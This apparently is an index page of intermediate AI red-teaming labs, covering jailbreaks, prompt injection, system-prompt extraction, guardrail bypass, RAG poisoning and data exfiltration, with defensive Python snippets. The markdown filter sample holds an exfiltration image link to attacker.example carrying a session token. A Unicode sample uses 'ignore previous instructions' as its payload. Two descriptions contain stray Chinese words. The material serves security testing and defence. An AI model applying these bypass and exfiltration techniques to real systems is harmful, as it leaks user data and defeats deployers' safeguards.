# intermediate

Hands-on lab on extracting system prompts from tool-using AI agents by exploiting tool interactions, observation channels, and multi-step reasoning to leak protected instructions.

lab agents prompt-leaking tool-use intermediate

Intermediate

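Lab: Agent Workflow Security Testing

Test multi-step agent workflows for injection points, state manipulation, and unauthorized action execution.

labs agent-workflow testing intermediate

Intermediate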

API Abuse Pattern Lab

Discover and exploit API abuse patterns, including parameter injection, header manipulation, and endpoint confusion.

intermediate abuse lab patterns labs api

Intermediate

API Parameter Fuzzing for LLMs

Systematically fuzz LLM API parameters to discover unexpected behaviors and bypasses.

labs api fuzzing intermediate

Intermediate

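Lab: Security Gaps in API Versioning

Exploit differences between LLM API versions to find deprecated endpoints and backward-compatibility security bypasses.

labs api-versioning security-gaps intermediate

Intermediate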

Lab: Automated Red Team Pipeline

Hands-on lab on building a continuous AI red team testing pipeline using promptfoo, GitHub Actions, and automated attack generation to catch safety regressions before deployment.

lab automation ci-cd promptfoo pipeline intermediate

Intermediate

Lab: Automated Red Team Testing

Set up promptfoo for continuous automated security testing of AI applications, with custom evaluators and CI/CD integration.

lab automated-testing promptfoo ci-cd intermediate hands-on

Intermediate

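Lab: Canary Token Effectiveness Testing

Deploy and test canary tokens in system prompts to evaluate how effectively they detect prompt extraction.

labs canary-tokens testing intermediate

Intermediate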
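A canary token is a unique, random marker planted in a system prompt. If that marker appears in model output, the prompt has leaked. Below is a minimal sketch of the mechanism under some assumptions:

- The canary is a random hex string.
- It is appended to the prompt on its own line.
- Detection is a case-insensitive substring check.

The helper names and the `ExampleCo` prompt are hypothetical.

```python
import secrets


def make_canary(prefix: str = "CANARY") -> str:
    """Return a random, hard-to-guess marker to plant in a system prompt."""
    return f"{prefix}-{secrets.token_hex(8)}"  # 16 hex characters of randomness


def embed_canary(system_prompt: str, canary: str) -> str:
    """Append the canary as an inert reference line (placement is an assumption)."""
    return f"{system_prompt}\n[ref:{canary}]"


def leaked(output: str, canary: str) -> bool:
    """Flag a model output that repeats the canary verbatim, ignoring case."""
    return canary.lower() in output.lower()


canary = make_canary()
system_prompt = embed_canary("You are a support assistant for ExampleCo.", canary)

print(leaked("My instructions say: " + system_prompt, canary))  # True
print(leaked("Sorry, I can't share my configuration.", canary))  # False
```

A verbatim check is only the baseline. The effectiveness question in this lab is how often extraction succeeds without tripping it, for example when the model paraphrases, translates, or encodes the prompt.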

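Lab: Chain-of-Thought Exploitation

Exploit chain-of-thought reasoning to leak the model's internal reasoning, bypass safety filters, and manipulate its decision process.

labs chain-of-thought exploitation intermediate

Intermediate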

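Lab: CI/CD Pipeline Security for LLM Applications

Test the security of CI/CD pipelines for LLM applications, including prompt template injection, model artifact tampering, and deployment attacks.

labs cicd pipeline-testing intermediate

Intermediate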

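Lab: Advanced Classifier Evasion

Evade advanced input classifiers using adversarial perturbations, semantic paraphrasing, and gradient-free optimization.

labs classifier evasion-advanced intermediate

Intermediate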

ML Classifier Evasion Lab

Develop payloads that evade machine learning-based input classifiers through adversarial text perturbation.

classifier intermediate evasion lab labs

Intermediate

Lab: Cloud AI Platform Security Testing

Test cloud AI platform configurations, including AWS Bedrock guardrails, Azure content filters, and GCP safety settings.

labs cloud-platform testing intermediate

Intermediate

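Lab: Code Generation Security Testing

Test LLM code generation for insecure patterns, injection vulnerabilities, and code execution security issues.

labs code-generation security-testing intermediate

Intermediate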

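Lab: AI Compliance Testing Fundamentals

Test LLM applications against the requirements of the OWASP LLM Top 10 and the NIST AI RMF using structured test procedures.

labs compliance testing intermediate

Intermediate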

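Lab: Context Window Attack Optimization

Use attention dynamics to optimize where prompt injections are placed in the context window for maximum attack effectiveness.

labs context-window optimization intermediate

Intermediate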

Context Window Poisoning Lab

Exploit context window management to inject persistent adversarial content that influences future model responses.

context intermediate lab poisoning window labs

Intermediate

Conversation Splitting Attack Lab

Split adversarial payloads across multiple conversation turns to bypass per-message safety classification.

intermediate splitting conversation lab labs

Intermediate

Conversation State Poisoning

Exploit conversation history manipulation to alter model behavior across turns.

labs conversation state-poisoning intermediate

Intermediate

Cross-Context Injection

Inject prompts that persist across separate conversation contexts in shared deployments.

labs cross-context injection intermediate

Intermediate

Custom Jailbreak Wordlist Generation

Generate targeted jailbreak wordlists using mutation strategies and seed prompts.

labs wordlists jailbreaking intermediate

Intermediate

Lab: Data Exfiltration Channels

Hands-on lab on extracting data from AI systems through markdown image rendering, invisible links, tool call parameters, and other covert exfiltration channels.

lab data-exfiltration covert-channels markdown intermediate

Intermediate
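The markdown image channel works because the client fetches the image URL, and that request can carry data in its query string. A common mitigation is to render images only from allowlisted hosts. The sketch below shows that filter under three assumptions:

- Only inline `![alt](url)` images are handled. Reference-style images and HTML `<img>` tags are out of scope.
- Hosts are compared by exact hostname.
- Relative URLs are treated as untrusted.

The host names are placeholders.

```python
import re
from urllib.parse import urlparse

# Inline Markdown images: ![alt](url) or ![alt](url "title"); reference-style images are not handled.
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')


def strip_untrusted_images(markdown: str, allowed_hosts: set[str]) -> str:
    """Replace images whose host is not allowlisted, so the client never requests the URL."""

    def replace(match: re.Match) -> str:
        host = urlparse(match.group(2)).hostname or ""  # relative URLs have no host
        if host in allowed_hosts:
            return match.group(0)
        return f"[image removed: {match.group(1)}]"

    return MD_IMAGE.sub(replace, markdown)


reply = (
    "Here is the logo ![logo](https://cdn.example.com/logo.png) "
    "![status](https://attacker.example/p.png?d=SESSION_TOKEN)"
)
print(strip_untrusted_images(reply, {"cdn.example.com"}))
```

When testing this channel, check whether the target applies a filter like this at all. If it does, check whether the parser can be sidestepped by syntax the filter does not recognize.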

Lab: Data Exfiltration Channels (Intermediate Lab)

Extract sensitive information from AI systems through various exfiltration channels, including crafted links, image tags, tool calls, and side-channel leakage.

lab data-exfiltration channels side-channel intermediate hands-on

Intermediate

Data Exfiltration via Side Channels

Extract data from LLM systems using timing, token probability, and formatting side channels.

labs exfiltration side-channels intermediate

Intermediate

Building Defense Bypass Chains

Combine multiple bypass techniques into reliable chains that defeat layered defenses.

labs defense-bypass chains intermediate

Intermediate

Lab: Defense Effectiveness Measurement

Hands-on lab on quantifying AI guardrail robustness using attack success rates, evasion metrics, false positive rates, and statistical analysis of defense performance.

lab defense metrics measurement guardrails intermediate

Intermediate
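An attack success rate (ASR) measured over a finite set of attempts is only an estimate, so it helps to report it with a confidence interval. The sketch below uses the Wilson score interval for a binomial proportion. It assumes each attempt is recorded as a boolean: `True` means the attack got past the guardrail. The function names and the 12-out-of-100 sample are illustrative.

```python
import math


def wilson_interval(successes: int, trials: int, z: float = 1.96) -> tuple[float, float]:
    """Wilson score interval for a binomial proportion (z = 1.96 gives roughly 95%)."""
    if trials <= 0:
        raise ValueError("trials must be positive")
    p = successes / trials
    denom = 1 + z**2 / trials
    centre = (p + z**2 / (2 * trials)) / denom
    half = z * math.sqrt(p * (1 - p) / trials + z**2 / (4 * trials**2)) / denom
    return max(0.0, centre - half), min(1.0, centre + half)


def attack_success_rate(results: list[bool]) -> tuple[float, float, float]:
    """Return (ASR, lower bound, upper bound); True marks an attempt that bypassed the defense."""
    k, n = sum(results), len(results)
    lo, hi = wilson_interval(k, n)
    return k / n, lo, hi


asr, lo, hi = attack_success_rate([True] * 12 + [False] * 88)
print(f"ASR={asr:.2%}  95% CI=[{lo:.2%}, {hi:.2%}]")
```

The Wilson interval behaves better than the simple normal approximation when the ASR is near 0 or 1, which is common for well-defended targets.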

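Lab: Building Defense Regression Tests

Build a regression testing framework that continuously verifies that LLM defenses remain effective against known attack patterns.

labs defense regression-testing intermediate

Intermediate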

Lab: Defense Effectiveness Testing

Systematically test and measure the robustness of AI guardrails using a structured methodology, metrics, and repeatable test suites.

lab defense-testing guardrails metrics intermediate hands-on

Intermediate

Document-Based RAG Injection Lab

Inject adversarial content into documents that a RAG system will process, in order to influence model responses.

intermediate injection lab labs rag document

Intermediate

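Lab: Advanced Embedding Manipulation

Manipulate embedding vectors to reach target similarity scores for RAG poisoning and retrieval manipulation.

labs embedding manipulation-advanced intermediate

Intermediate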

Practical Embedding Manipulation

Manipulate text to achieve target embedding similarities for poisoning retrieval-augmented generation systems.

intermediate lab practical manipulation embedding labs

Intermediate

Embedding Similarity Attacks

Manipulate text to achieve target embedding similarity scores for retrieval poisoning.

labs embeddings similarity intermediate

Intermediate
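Vector retrieval commonly ranks chunks by cosine similarity between the query embedding and each document embedding. That is why a document crafted to lie close to the query direction outranks a benign one. In the sketch below, toy three-dimensional vectors stand in for real embeddings; a real system would obtain them from an embedding model. The document names are hypothetical.

```python
import math


def cosine_similarity(a: list[float], b: list[float]) -> float:
    """cos(a, b) = (a . b) / (|a| * |b|); returns 0.0 if either vector is all zeros."""
    if len(a) != len(b):
        raise ValueError("vectors must have the same dimension")
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def rank(query: list[float], docs: dict[str, list[float]]) -> list[str]:
    """Order document names from most to least similar to the query."""
    return sorted(docs, key=lambda name: cosine_similarity(query, docs[name]), reverse=True)


query = [1.0, 0.0, 0.0]                  # toy stand-in for an embedded user query
docs = {
    "benign_faq": [0.2, 0.9, 0.1],
    "crafted_doc": [0.9, 0.1, 0.0],      # tuned to sit near the query direction
}
print(rank(query, docs))  # ['crafted_doc', 'benign_faq']
```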

Lab: Encoding Bypasses

Hands-on lab on systematically testing Base64, ROT13, Unicode homoglyph, hexadecimal, and combined encoding bypasses against LLM safety filters, with measured success rates.

lab encoding bypass obfuscation systematic-testing intermediate

Intermediate

Fine-Tuning API Security Probing

Probe fine-tuning APIs for security weaknesses, including insufficient validation and unsafe default configurations.

fine intermediate tuning lab labs api

Intermediate

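Lab: Testing the Safety Impact of Fine-Tuning

Measure how fine-tuning affects model safety by comparing safety benchmark scores before and after fine-tuning.

labs fine-tuning safety-testing intermediate

Intermediate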

Lab: Guardrail Bypass Techniques

Practice guardrail bypass techniques against NeMo Guardrails, LLM Guard, and custom classifier defenses.

labs guardrail-bypass techniques intermediate

Intermediate

Guardrail Fingerprinting

Systematically map the rules and thresholds of input/output guardrail systems.

labs guardrails fingerprinting intermediate

Intermediate

Guardrail Rule Extraction Lab

Systematically extract the rules and decision boundaries of guardrail systems through targeted probing.

guardrail rule intermediate lab labs extraction

Intermediate

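Lab: Exploiting LLM Hallucinations

Exploit hallucination tendencies to trigger fabricated tool calls, fictitious API endpoints, and false fact injection.

labs hallucination exploitation intermediate

Intermediate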

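Lab: AI Incident Response Simulation

Practice AI incident response procedures through a simulated prompt injection incident, including escalation and containment workflows.

labs incident-response simulation intermediate

Intermediate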

Lab: Indirect Prompt Injection

Inject instructions through external data sources, such as documents, web pages, and emails, that a target AI system processes as context.

lab indirect-injection external-data documents intermediate hands-on

Intermediate

Indirect Injection via Web Content

Plant prompt injection payloads in web pages consumed by RAG-enabled LLM applications.

labs indirect-injection web intermediate

Intermediate

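Lab: Instruction-Following Measurement

Quantitatively measure instruction-following compliance and identify how the model prioritizes competing instructions.

labs instruction-following measurement intermediate

Intermediate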

LLM Judge Manipulation

Craft responses that exploit LLM-as-judge evaluation patterns to achieve high safety scores while embedding harmful content.

labs llm-judge manipulation intermediate

Intermediate

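Lab: Attack Analysis with Log Probabilities

Use token log probabilities to extract information about training data, system prompts, and model internals.

labs logprobs analysis intermediate

Intermediate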

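Lab: Advanced MCP Protocol Testing

Perform advanced security testing of MCP servers, including transport analysis, capability enumeration, and tool poisoning.

labs mcp advanced-testing intermediate

Intermediate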

MCP Tool Poisoning Attacks

Exploit MCP tool descriptions to inject instructions that redirect agent behavior.

labs mcp tool-poisoning intermediate

Intermediate

Lab: Model Context Protocol Fuzzing

Fuzz MCP protocol messages to uncover parsing errors, validation gaps, and unexpected behavior in MCP servers.

labs mcp-fuzzing protocol intermediate

Intermediate

Practical Model Fingerprinting Lab

Fingerprint the underlying model behind an API endpoint to identify its type, version, and configuration.

fingerprinting intermediate lab practical labs model

Intermediate

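Lab: Setting Up LLM Security Monitoring

Deploy a complete security monitoring system with anomaly detection and alerting for LLM applications.

labs monitoring security-setup intermediate

Intermediate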

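Lab: Multi-Agent Communication Testing

Test the security of inter-agent communication in multi-agent systems, including message injection and trust boundary violations.

labs multi-agent communication-testing intermediate

Intermediate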

Multi-Language Safety Bypass Lab

Exploit gaps in safety training coverage across languages to bypass safety mechanisms using code-switching.

intermediate bypass lab language labs multi

Intermediate

Multi-Language Injection Attacks

Exploit language switching and low-resource language gaps to bypass safety training.

labs multilingual injection intermediate

Intermediate

Multi-Model Attack Chaining

Chain attacks across multiple LLMs in a pipeline to bypass per-model defenses.

labs multi-model chaining intermediate

Intermediate

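Lab: Multi-Model Comparative Safety Testing

Run the same attack suite against multiple LLM providers to compare their safety postures and analyze how their responses differ.

labs multi-model comparison-testing intermediate

Intermediate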

Multi-Model Pipeline Attack Lab

Attack a pipeline in which multiple models process data sequentially, exploiting the trust between pipeline stages.

pipeline intermediate lab labs multi model

Intermediate

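Lab: Multi-Turn State Tracking Attacks

Exploit conversation state tracking to build up a persistent attack context over multiple turns.

labs multi-turn state-tracking intermediate

Intermediate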

Lab: Multimodal Injection

Hands-on lab on embedding text instructions in images to exploit vision-enabled LLMs. Learn to craft visual prompt injections, test OCR-based attacks, and evaluate multimodal safety boundaries.

lab multimodal vision image-injection intermediate

Intermediate

Lab: Multimodal Injection (Intermediate Lab)

Embed prompt injection instructions in images for vision-enabled models, testing how visual content can carry adversarial payloads.

lab multimodal image-injection vision intermediate hands-on

Intermediate

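Lab: Intermediate Multimodal Security Testing

Test multimodal LLMs with crafted images containing embedded text, adversarial perturbations, and visual injection payloads.

labs multimodal intermediate-testing intermediate

Intermediate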

Output Channel Discovery Lab

Discover alternative output channels in LLM applications that bypass standard output filtering.

discovery channel intermediate output lab labs

Intermediate

Lab: Output Schema Exploitation

Exploit structured output schemas to force the model to disclose information through required fields.

labs output-schema exploitation intermediate

Intermediate

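Lab: Prompt Caching Side-Channel Attacks

Exploit prompt caching mechanisms to detect cached prompts and extract information through timing side channels.

labs prompt-caching side-channel intermediate

Intermediate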

Prompt Leakage Technique Lab

Practice multiple system prompt extraction techniques and measure their effectiveness across different targets.

intermediate techniques lab prompt labs leakage

Intermediate

Automated Red Teaming with PyRIT

Use Microsoft's PyRIT framework to run automated multi-turn attack campaigns.

labs pyrit automated intermediate

Intermediate

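Lab: Advanced RAG Security Testing

Test RAG systems for weaknesses to chunking exploitation, reranking manipulation, and cross-document injection attacks.

labs rag advanced-testing intermediate

Intermediate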

RAG Context Poisoning

Poison a vector database to inject adversarial content into RAG retrieval results.

labs rag poisoning intermediate

Intermediate

Reasoning Chain Hijacking

Hijack the model's chain-of-thought reasoning to redirect its conclusions toward attacker-controlled objectives.

intermediate chain lab hijacking reasoning labs

Intermediate

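Lab: Role Hierarchy Exploitation

Exploit multi-role LLM architectures by manipulating the instruction hierarchy among the system, user, and assistant roles.

labs role-hierarchy exploitation intermediate

Intermediate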

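Lab: Safety Filter Benchmarking

Benchmark safety filters across providers with a standardized test suite, comparing detection rates and false positive rates.

labs safety-filter benchmarking intermediate

Intermediate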
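Detection rate and false positive rate both come from a simple confusion-matrix tally over a labeled test suite. The sketch below makes two assumptions:

- Each test case carries a ground-truth label (`True` = harmful).
- Each case has a recorded filter verdict (`True` = blocked).

The class and function names are hypothetical, and the eight-case suite is illustrative only.

```python
from dataclasses import dataclass


@dataclass
class FilterMetrics:
    tp: int = 0  # harmful prompt, filter blocked it
    fp: int = 0  # benign prompt, filter blocked it
    tn: int = 0  # benign prompt, filter allowed it
    fn: int = 0  # harmful prompt, filter allowed it

    @property
    def detection_rate(self) -> float:
        """Share of harmful prompts that were blocked (true positive rate)."""
        total = self.tp + self.fn
        return self.tp / total if total else 0.0

    @property
    def false_positive_rate(self) -> float:
        """Share of benign prompts that were wrongly blocked."""
        total = self.fp + self.tn
        return self.fp / total if total else 0.0


def score(labels: list[bool], blocked: list[bool]) -> FilterMetrics:
    """labels[i] is True for a harmful test case; blocked[i] is the filter's verdict."""
    if len(labels) != len(blocked):
        raise ValueError("labels and verdicts must align")
    m = FilterMetrics()
    for harmful, was_blocked in zip(labels, blocked):
        if harmful and was_blocked:
            m.tp += 1
        elif harmful:
            m.fn += 1
        elif was_blocked:
            m.fp += 1
        else:
            m.tn += 1
    return m


labels = [True, True, True, True, False, False, False, False]
blocked = [True, True, True, False, False, False, True, False]
m = score(labels, blocked)
print(m.detection_rate, m.false_positive_rate)  # 0.75 0.25
```

To compare providers fairly, run the same labeled suite against each one.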

Semantic Deception Crafting Lab

Craft semantically coherent prompts that conceal adversarial intent from both human reviewers and ML classifiers.

crafting intermediate semantic lab deception labs

Intermediate

Semantic Injection Crafting

Craft semantically coherent injections that evade both classifiers and human review.

labs semantic injection intermediate

Intermediate

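Lab: Semantic Search Manipulation

Manipulate semantic search results by crafting documents that reach target similarity scores for specific queries.

labs semantic-search manipulation intermediate

Intermediate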

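Lab: Session Isolation Testing

Test session isolation in multi-tenant LLM deployments to detect cross-session data leakage and context contamination.

labs session-isolation testing intermediate

Intermediate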

Session State Exploitation Lab

Exploit session management vulnerabilities in LLM applications to access other users' data or escalate privileges.

exploitation intermediate session lab labs state

Intermediate

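Lab: Streaming Response Manipulation

Exploit streaming response mechanisms to bypass output filters that only inspect the complete response.

labs streaming response-manipulation intermediate

Intermediate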
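This lab targets filters that only see the finished response. The defensive counterpart is a filter that checks the stream as it goes. Below is a sketch of one, assuming a plain blocklist of terms as a hypothetical stand-in for a real output classifier:

- It scans buffered text rather than individual chunks, so a term split across a chunk boundary is still caught.
- It holds back the last `len(term) - 1` characters, since those could still be completed by the next chunk.

The function name and the `TOKEN-XYZ` marker are illustrative.

```python
from typing import Iterable, Iterator


def filtered_stream(chunks: Iterable[str], blocked_terms: list[str]) -> Iterator[str]:
    """Re-emit streamed chunks, withholding the rest of the response once a blocked term appears."""
    terms = [t.lower() for t in blocked_terms]
    # A term can straddle a chunk boundary only within its last len(term) - 1 characters.
    hold_back = max((len(t) for t in terms), default=1) - 1
    buffer = ""
    for chunk in chunks:
        buffer += chunk
        if any(t in buffer.lower() for t in terms):
            yield "[response withheld]"
            return
        safe_upto = len(buffer) - hold_back
        if safe_upto > 0:
            yield buffer[:safe_upto]  # this prefix can no longer be part of a match
            buffer = buffer[safe_upto:]
    if buffer:
        yield buffer  # stream ended cleanly: flush the held-back tail


print(list(filtered_stream(["your value: TOK", "EN-XYZ done"], ["TOKEN-XYZ"])))
# ['your va', '[response withheld]']
```

A per-chunk check would pass both chunks above, because neither contains the full term on its own.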

Structured Output Safety Bypass

Use JSON mode and structured output constraints to extract information that would be refused in free-form responses.

intermediate bypass output lab structured labs

Intermediate

Structured Output Exploitation

Exploit JSON mode and structured output constraints to bypass safety filters.

labs structured-output exploitation intermediate

Intermediate

Lab: Supply Chain Audit

Audit an ML project's dependencies for vulnerabilities, covering model files, Python packages, container images, and training data provenance.

lab supply-chain audit dependencies security intermediate hands-on

Intermediate

Lab: ML Supply Chain Scan

Hands-on lab on auditing machine learning model dependencies, detecting malicious packages in ML pipelines, and scanning model files for backdoors and supply chain threats.

lab supply-chain security scanning dependencies intermediate

Intermediate
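Many model files are pickle-based, including PyTorch checkpoints written with `torch.save`. Loading such a file can import and call arbitrary objects. The sketch below uses the standard library's `pickletools.genops` to walk the opcode stream without executing it, and lists the opcodes that import or invoke callables. It is a first-pass heuristic only. Legitimate checkpoints also contain these opcodes, so a real scan would resolve the imported module/name pairs and compare them against an allowlist. The opcode set and function name are assumptions of this sketch.

```python
import pickle
import pickletools

# Opcodes that import a callable (GLOBAL, STACK_GLOBAL) or call/instantiate one.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def risky_opcodes(data: bytes) -> list[tuple[str, int]]:
    """List (opcode name, byte offset) for risky opcodes, without unpickling the data."""
    return [
        (opcode.name, pos)
        for opcode, _arg, pos in pickletools.genops(data)
        if opcode.name in RISKY_OPCODES
    ]


plain = pickle.dumps({"weights": [0.1, 0.2]})  # only builtin containers and floats
calls = pickle.dumps(range(3))                  # range is rebuilt via an imported callable

print(risky_opcodes(plain))  # []
print([name for name, _ in risky_opcodes(calls)])
```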

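Lab: System Prompt Reconstruction (Intermediate Lab)

Reconstruct the full system prompt through iterative partial extraction and cross-referencing of multiple leakage vectors.

labs system-prompt reconstruction intermediate

Intermediate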

Advanced Token Smuggling

Use Unicode homoglyphs, zero-width characters, and tokenizer quirks to smuggle payloads.

labs token-smuggling advanced intermediate

Intermediate

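Lab: Tool Result Injection Attacks

Inject adversarial content through tool call results to poison model reasoning and redirect subsequent actions.

labs tool-result injection intermediate

Intermediate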

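Lab: Unicode Normalization Bypass Attacks

Exploit differences in Unicode normalization between input validation and model processing to smuggle injection payloads.

labs unicode normalization-bypass intermediate

Intermediate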
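The bypass works when the validator compares raw code points but the model effectively reads the normalized text. Two examples are fullwidth letters (`ｉ` is U+FF49) and a word split by a zero-width space. The sketch below contrasts a naive substring check with one that first canonicalizes the text by applying NFKC, stripping a few zero-width characters, and casefolding. The zero-width list is a non-exhaustive assumption, and the function names are hypothetical.

```python
import re
import unicodedata

# Zero-width and BOM code points often used to split keywords (not an exhaustive list).
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\u2060\ufeff]")


def canonicalize(text: str) -> str:
    """NFKC-normalize, strip zero-width characters, then casefold."""
    return ZERO_WIDTH.sub("", unicodedata.normalize("NFKC", text)).casefold()


def naive_match(text: str, term: str) -> bool:
    return term in text


def canonical_match(text: str, term: str) -> bool:
    return canonicalize(term) in canonicalize(text)


fullwidth = "ｉｇｎｏｒｅ previous instructions"  # fullwidth Latin letters
split = "ig\u200bnore previous instructions"     # zero-width space inside the word

for payload in (fullwidth, split):
    print(naive_match(payload, "ignore"), canonical_match(payload, "ignore"))  # False True
```

NFKC does not map cross-script homoglyphs, such as Cyrillic "о" to Latin "o". Catching those requires a confusables mapping like the one defined in Unicode Technical Standard #39.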

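Lab: Vector Database Access Control Testing

Test vector database access controls for bypass vulnerabilities, including namespace traversal and filter manipulation.

labs vector-db access-control intermediate

Intermediate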

Agent Goal Hijacking

Redirect an AI agent's objectives through carefully crafted inputs that override its primary task.

labs agent goal-hijacking intermediate

Intermediate

Assistant Prefill Injection Attacks

Exploit assistant message prefilling to prime model responses and bypass safety alignment.

labs assistant-prefill injection intermediate

Intermediate

Chat History Manipulation Attacks

Inject false messages into conversation history to alter model behavior in subsequent turns.

labs chat-history manipulation intermediate

Intermediate

Input Classifier Boundary Mapping

Systematically probe input classifiers to map their decision boundaries與find bypass regions.

labs classifier boundary-mapping intermediate

Intermediate

Context Window Boundary Exploitation

Exploit the boundaries of context windows to push safety instructions beyond the model's attention.

labs context-window boundary intermediate

Intermediate

Crescendo Attack Implementation

Implement Microsoft's Crescendo multi-turn escalation attack with automated conversation management.

labs crescendo implementation intermediate

Intermediate

Cross-Plugin Exploit Chaining

Chain exploits across multiple plugins/tools in an agent system to achieve multi-step attacks.

labs cross-plugin chaining intermediate

Intermediate

Function Schema Manipulation

Exploit function-calling schemas to inject instructions through parameter descriptions and enums.

labs function-schema manipulation intermediate

Intermediate

Building Custom Garak Probes

Develop custom probe modules for NVIDIA Garak to test organization-specific vulnerability patterns.

labs garak custom-probes intermediate

Intermediate

Guardrail Latency-Based Detection

Use timing side channels to identify and characterize guardrail implementations in LLM applications.

labs guardrails latency detection intermediate

Intermediate

Custom Inspect AI Safety Evaluations

Build custom safety evaluation tasks in Inspect AI to test application-specific vulnerability classes.

labs inspect-ai custom-evaluations intermediate

Intermediate

JailbreakBench Comparative Testing

Run standardized jailbreak benchmarks across multiple models and compare their vulnerability profiles.

labs jailbreakbench comparative intermediate

Intermediate

JSON Mode Safety Bypass

Exploit structured JSON output modes to bypass safety filters that only check plain-text responses.

labs json-mode safety-bypass intermediate

Intermediate

LLM Guard Evasion Techniques

Develop evasion techniques against LLM Guard input scanners and output detectors.

labs llm-guard evasion intermediate

Intermediate

Implementing Many-Shot Jailbreaking

Implement Anthropic's many-shot jailbreaking technique with scaling analysis across conversation lengths.

labs many-shot jailbreaking intermediate

Intermediate

MCP Resource Data Exfiltration (Intermediate Lab)

Exploit MCP resource URIs to access and exfiltrate data beyond intended scope boundaries.

labs mcp resource exfiltration intermediate

Intermediate

Multi-Language Safety Gap Exploitation

Systematically identify and exploit safety training gaps across low-resource languages.

labs multilingual safety-gaps intermediate

Intermediate

Multi-Turn State Tracking Exploitation

Exploit state management in multi-turn conversations to gradually shift model behavior over many turns.

labs multi-turn state-tracking intermediate

Intermediate

NeMo Guardrails Bypass Techniques

Test and bypass NVIDIA NeMo Guardrails configurations using known evasion techniques.

labs nemo-guardrails bypass intermediate

Intermediate

Output Filter Bypass via Encoding

Bypass output safety filters by instructing the model to encode responses in Base64, hex, or custom schemes.

labs output-filter bypass encoding intermediate

Intermediate
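The bypass succeeds when the output filter only inspects the literal text. One mitigation is to also filter decoded views of anything that looks encoded. The sketch below covers only Base64, under two assumptions:

- Any run of 16 or more Base64-alphabet characters, with optional padding, is a candidate.
- The filter itself is a simple term match.

Hex, ROT13, and custom schemes would each need their own decoder. The helper names and the `hunter2` secret are hypothetical.

```python
import base64
import binascii
import re

# Runs of 16+ Base64 alphabet characters with optional padding (threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_views(text: str) -> list[str]:
    """Return the original text plus any Base64-looking runs that decode to UTF-8 text."""
    views = [text]
    for match in B64_RUN.finditer(text):
        try:
            views.append(base64.b64decode(match.group(0), validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64, or decodes to non-text bytes
    return views


def output_blocked(text: str, blocked_terms: list[str]) -> bool:
    """Apply a simple term filter to the raw output and to every decoded view."""
    views = [v.lower() for v in decoded_views(text)]
    return any(term.lower() in view for view in views for term in blocked_terms)


encoded = base64.b64encode(b"internal password: hunter2").decode("ascii")
print(output_blocked(f"Sure! {encoded}", ["hunter2"]))  # True
```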

PDF Document Injection for RAG Systems

Craft adversarial PDF documents that inject instructions when processed by RAG document loaders.

labs pdf injection rag intermediate

Intermediate

Prompt Template Variable Injection

Inject adversarial content through template variable expansion in prompt management systems.

labs prompt-template variable-injection intermediate

Intermediate

PyRIT Custom Attack Strategies

Build custom attack strategies and converters in Microsoft's PyRIT framework for targeted campaigns.

labs pyrit custom-strategies intermediate

Intermediate

RAG Document Injection Campaign

Design and execute a document injection campaign against a RAG-powered application with vector search.

labs rag document-injection intermediate

Intermediate

Semantic Search Poisoning

Craft adversarial documents that rank highly in semantic search for targeted queries in RAG systems.

labs semantic-search poisoning embeddings intermediate

Intermediate

Streaming Response Exfiltration

利用 streaming API responses to exfiltrate data that might be caught by batch output filters.

labs streaming response exfiltration intermediate

Intermediate

System Prompt Extraction via Token Probabilities

Exploit token probability APIs to reconstruct hidden system prompts character by character.

labs logprobs system-prompt intermediate

Intermediate

Token Boundary Manipulation

Exploit tokenizer-specific behavior by crafting inputs that split across token boundaries in unexpected ways.

labs tokenizer boundary-manipulation intermediate

Intermediate

Tool Result Injection Attacks

Craft malicious tool return values that inject instructions back into the model's reasoning chain.

labs tool-result injection intermediate

Intermediate

Injecting Text via Images to VLMs

Embed adversarial text in images that vision-language models read and follow as instructions.

labs vision text-injection images intermediate

Intermediate

Lab: Data Exfiltration via Webhooks

Test data exfiltration paths through LLM-triggered webhooks, API callbacks, and external URL rendering.

labs webhook exfiltration intermediate

Intermediate

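Simulation: Startup AI Assessment

Red team a startup's AI-powered product with limited scope and budget, making pragmatic trade-offs between thoroughness and time constraints.

simulation startup assessment budget-constrained intermediate

Intermediate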

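Code Injection via Markdown

Inject executable payloads through Markdown rendering of LLM output, exploiting the gap between text generation and content rendering in web-based LLM interfaces.

prompt-injection markdown code-injection xss red-teaming intermediate

Intermediate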

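Context Window Stuffing Attacks

Techniques for filling an LLM's context window to push system instructions out of active memory, diluting or displacing defensive prompts by manipulating the token budget.

prompt-injection context-window token-manipulation red-teaming intermediate

Intermediate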

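Delimiter Escape Attacks

Techniques that exploit the delimiters LLM applications use to separate system and user content, breaking out of sandboxed input regions to inject instructions.

prompt-injection delimiter-escape sandbox-escape red-teaming intermediate

Intermediate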

Encoding-Based Evasion

Using base64, ROT13, hexadecimal, Unicode, and other encoding schemes to evade input detection systems and bypass content filters in LLM applications.

prompt-injection encoding base64 rot13 unicode evasion red-teaming intermediate

Intermediate

Few-Shot Injection

Using crafted few-shot examples within user input to steer LLM behavior toward unintended outputs, exploiting in-context learning to override safety training.

prompt-injection few-shot in-context-learning red-teaming intermediate

Intermediate

Payload Obfuscation Techniques

Methods for disguising prompt injection payloads through encoding, splitting, substitution, and other obfuscation techniques to bypass input filters and detection systems.

prompt-injection obfuscation evasion payload-crafting red-teaming intermediate

Intermediate

Role-Play Injection

Using fictional scenarios, character role-play, and narrative framing to bypass LLM safety filters by having the model operate within a permissive fictional context.

prompt-injection role-play jailbreak fictional-framing red-teaming intermediate

Intermediate

Translation Injection

Using translation requests and low-resource languages to bypass content filters, exploiting the uneven distribution of safety training across languages.

prompt-injection translation multilingual low-resource-languages red-teaming intermediate

Intermediate

Virtual Persona Creation

Creating persistent alternate personas within LLM conversations to bypass safety training, establishing character identities that override the model's default behavioral constraints.

prompt-injection persona jailbreak DAN character-creation red-teaming intermediate

Intermediate

# intermediate

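Intermediate Certification Prep Guide

Capstone: Compliance Assessment Simulation

Capstone: Red Team Program Design

Capstone: Industry Vertical Deep Dive

LLM Guard and Protect AI Guardian

NVIDIA NeMo Guardrails

AI Anomaly Detection

AI Monitoring and Observability

AI Logging Architecture

Adversarial ML: Core Concepts

AI Threat Models: White-Box, Black-Box, and Gray-Box

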